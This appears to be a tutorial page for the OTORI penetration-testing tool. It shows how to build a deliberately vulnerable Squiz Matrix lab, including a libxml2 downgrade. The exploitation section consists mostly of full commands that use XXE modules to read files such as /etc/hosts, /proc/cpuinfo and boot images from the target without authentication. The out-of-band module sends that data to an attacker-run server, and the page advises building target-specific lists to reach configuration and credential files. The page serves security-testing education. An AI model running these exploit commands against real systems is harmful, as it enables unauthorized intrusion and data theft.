Home > Software > OTORI - Example 2: Squiz Matrix
OTORI - Example 2: Squiz Matrix
This article describes security testing-related software whose use may be restricted or prohibited in your place of residence or your workplace. The penalties for violating laws and regulations regarding security testing-related tools can be severe. Ensuring that you are allowed to use this software is your responsibility.
The instructions in this tutorial are slightly less-detailed than for other articles on this website. This is because the software described should not be used if you are unfamiliar with basic- to intermediate-level use of Linux. Proceeding without having that knowledge is very likely to result in damage and/or loss of data.
Squiz Matrix is one of many open-source content-management systems available today. According to its creators, its focus is on people who work in marketing.
From an XXE perspective, Squiz Matrix is interesting because the vulnerable version does not require authentication to misuse, and as a PHP-based application, can be used to retrieve binary content (although the filesize is limited to about 2KiB unless it was built in an unusual way).
Taking advantage of Squiz Matrix requires the use of the type of techniques described by Timur Yunusov and Alexey Osipov at Black Hat EU 2013[1].
Important: Squiz Matrix becomes invulnerable to the modules described below if the system-level libxml2 library is too new. The change appears to have been made in early June of 2014 in the Ubuntu release of libxml2, which is noted as being intended to address CVE-2014-0191. The instructions below include a step to downgrade the library in question. If you find an instance which is not vulnerable in a real pen-test, the underlying OS has probably had its libraries patched.
Test Environment Systems
You'll need 2-3 systems for this exercise:
I strongly recommend that you build VMs specifically for this testing, or at least snapshot existing VMs before you begin, so that if something goes wrong, you won't lose any data/work. This software is a pre-alpha preview of a tool designed for penetration testing (in other words, it actively misuses its target(s)). Take appropriate safety precautions.
Test Environment Setup
Setting up the attacking system is easy — just unpack the current release of On The Outside, Reaching In. If you are running She Wore A Mirrored Mask on a separate system, you'll want to unpack that too.
The target system will take more effort — Squiz Matrix is a bit of a chore to set up. The following instructions should get you up and running if you're using Ubuntu 12.04 x64 as the base OS. Any other OS will result in you pretty much being on your own, due to the large number of dependencies required. I really recommend that you build an Ubuntu 12.0.4 VM specifically to install Squiz Matrix on — there are a number of aspects to the configuration that will make it difficult to host anything else on it.
Screenshots of key steps are below the list of instructions.
sudo apt-get install autoconf automake bison build-essential cvs flex gcc g++ libtool m4 make wget postgresql apache2-mpm-prefork php5 libapache2-mod-php5 php5-gd php5-pgsql php-pear
sudo pear install Auth_SASL DB Archive_Tar Mail Mail_Mime Mail_mimeDecode Mail_Queue XML_HTMLSax XML_Parser XML_RPC XML_Tree Text_Diff HTTP HTTP_Request HTTP_Client Net_URL Image_Graph-0.7.2 Image_Color Image_Canvas-0.3.1 Math_Stats-0.8.5 Net_SMTP Net_Socket Numbers_Roman Numbers_Words-0.16.4 I18N_UnicodeNormalizer Services_JSON MDB2 pear/MDB2#pgsql
sudo apt-get install libxml2=2.7.8.dfsg-5.1ubuntu4
(I know that versions as recent as 2.7.8.dfsg-5.1ubuntu4.6 are vulnerable, but they're not in the standard repository).
wget "http://public-cvs.squiz.net/cgi-bin/viewcvs.cgi/*checkout*/mysource_matrix/scripts/dev/checkout.sh"
chmod +x checkout.sh
./checkout.sh mysource_4-6-3 "squiz_matrix_4.6.3"
(note: you will get a few errors indicating "no such tag mysource_4-6-3" — this is because those components did not exist when 4.6.3 was released.
tar -cjvf "squiz_matrix_4.6.3.tar.bz2" squiz_matrix_4.6.3
sudo su
su postgres
createuser -SRDU postgres matrix
createuser -SRDU postgres matrix_secondary
Note that these commands will create these users with empty passwords. This is very bad, but it is word-for-word from the official Squiz Matrix installation guide. We'll be fixing that shortly.
createdb -U postgres -O matrix -E UTF8 squiz_matrix
createlang -U postgres plpgsql squiz_matrix
psql
ALTER DATABASE squiz_matrix SET bytea_output TO 'escape';
ALTER USER matrix WITH PASSWORD '2737ae7431508912302bf3513c0189bf';
ALTER USER matrix_secondary WITH PASSWORD '6152d75ceb00a4f82368fc8fdaa41618';
\q
exit
exit
php install/step_01.php /home/squiz/squiz_matrix_4.6.3
php install/step_02.php /home/squiz/squiz_matrix_4.6.3
php install/compile_locale.php /home/squiz/squiz_matrix_4.6.3
php install/step_03.php /home/squiz/squiz_matrix_4.6.3
php install/compile_locale.php /home/squiz/squiz_matrix_4.6.3
chmod --recursive o+w cache
chmod --recursive o+w data
<VirtualHost *:80>
ServerName squiztarget.vuln.local
ServerAdmin webmaster@localhost
DocumentRoot /home/squiz/squiz_matrix_4.6.3/core/web
Options -Indexes FollowSymLinks
<Directory /home/squiz/squiz_matrix_4.6.3>
Order deny,allow
Deny from all
</Directory>
<DirectoryMatch "^/home/squiz/squiz_matrix_4.6.3/(core/(web|lib)|data/public|fudge)">
Order allow,deny
Allow from all
</DirectoryMatch>
<DirectoryMatch "^/home/squiz/squiz_matrix_4.6.3/data/public/assets">
SetHandler default-handler
</DirectoryMatch>
<FilesMatch "\.inc$">
Order allow,deny
Deny from all
</FilesMatch>
<LocationMatch "/(CVS|\.FFV)/">
Order allow,deny
Deny from all
</LocationMatch>
Alias /__fudge /home/squiz/squiz_matrix_4.6.3/fudge
Alias /__data /home/squiz/squiz_matrix_4.6.3/data/public
Alias /__lib /home/squiz/squiz_matrix_4.6.3/core/lib
Alias / /home/squiz/squiz_matrix_4.6.3/core/web/index.php/
</VirtualHost>
sudo /etc/init.d/apache2 restart
Yay! You're done! Unless you got some errors, in which case you'll need to do some web searches.
Preparing to Exploit Squiz Matrix
In contrast to the ordeal of setting up the simulated target system, exploiting Squiz Matrix 4.6.3 is ridiculously easy when using On The Outside, Reaching In. All you need to know in order to proceed to the next section is the web administration URL for the target Squiz Matrix instance. For example, if you followed the steps in the previous section exactly, that would be http://squiztarget.vuln.local/_admin/.
That's right - you don't even need a web browser — let alone an intercepting proxy — if you know the URL in question.
SOS-12-007-YU-OOB - Fully Out-Of-Band Data Exfiltration Module
SOS-12-007-YU-OOB is the most effective of the three Squiz Matrix-related modules, so if you only read one section of this tutorial, it should be this one.
For purposes of this tutorial, assume that swamm.vuln.local is the machine name for the attacking system running She Wore A Mirrored Mask. If you are using a different name, or an IP address, substitute that as necessary. The name or IP you use must be defined and accessible to the target system as well as the attacking system. That is, if you have defined swamm.vuln.local in the /etc/hosts file on your attacking system, you must also define it in the /etc/hosts file on the simulated target system.
python ./swamm.py
python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///proc/cpuinfo" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///boot/grub/boot.img" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --exacturilist "lists/linux-system_information.txt" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
In many cases, you will need to obtain further information about the system and use that to construct targeted lists. For example, perhaps there is a web interface to another component on the system which tells you that its base installation directory is /opt/some_server_18.2.3/. You could download the installer for that software to a test VM, unpack it, and figure out what its interesting contents might be (e.g. conf/database_connection_string.xml), and then map that relative path onto the known base path for the real target server.
SOS-12-007-YU-OOB - Screenshots | ||||||||||||
|
|
|
|
|||||||||
Illustrations related to the preceeding section. |
SOS-12-007-YU-404 - Reference To Nonexistent Page/Error-Reflection (Base64-Encoded) Module
This module works in virtually the same way as SOS-12-007-YU-OOB. For example, to retrieve the /etc/hosts file:
python ./otori.py --clone --module "SOS-12-007-YU-404" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///etc/hosts" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
SOS-12-007-YU-IU - Reference To Invalid URI/Error-Reflection (Non-Base64-Encoded) Module
This module is included for purposes of showing the different ways that the actual vulnerability in Squiz Matrix can be exploited (for those who are interested in writing their own modules). It is not recommended for general use (partly because unlike the previous two, it cannot retrieve binary content), but uses the same syntax as SOS-12-007-YU-OOB. For example, to retrieve the /etc/hosts file:
python ./otori.py --clone --module "SOS-12-007-YU-IU" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///etc/hosts" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"
1. | See the whitepaper by Timur Yunusov and Alexey Osipov and the slides from the corresponding BlackHat EU 2013 presentation - also by Timur Yunusov and Alexey Osipov. |
2. |
The following versions of Pear-installed components were used when writing this tutorial:
Archive_Tar [was installed by default] Auth_SASL DB: 1.0.6 HTTP: 1.4.1 HTTP_Client: 1.2.1 HTTP_Request: 1.4.4 I18N_UnicodeNormalizer: 1.0.0 Image_Canvas: 0.3.1 Image_Color: 1.0.4 Image_Graph: 0.7.2 Mail: 1.2.0 Mail_Mime: 1.8.9 Mail_mimeDecode: 1.5.5 Mail_Queue: 1.2.7 Math_Stats: 0.8.5 MDB2: 2.4.1 MDB2_Driver_pgsql: 1.4.1 Net_SMTP: 1.6.2 Net_Socket: 1.0.14 Net_URL: 1.0.15 Numbers_Roman: 1.0.2 Numbers_Words: 0.16.4 Services_JSON: 1.0.3 Text_Diff: 1.1.1 XML_HTMLSax: 2.1.2 XML_Parser: 1.3.4 XML_RPC: 1.5.5 XML_Tree: 1.1 |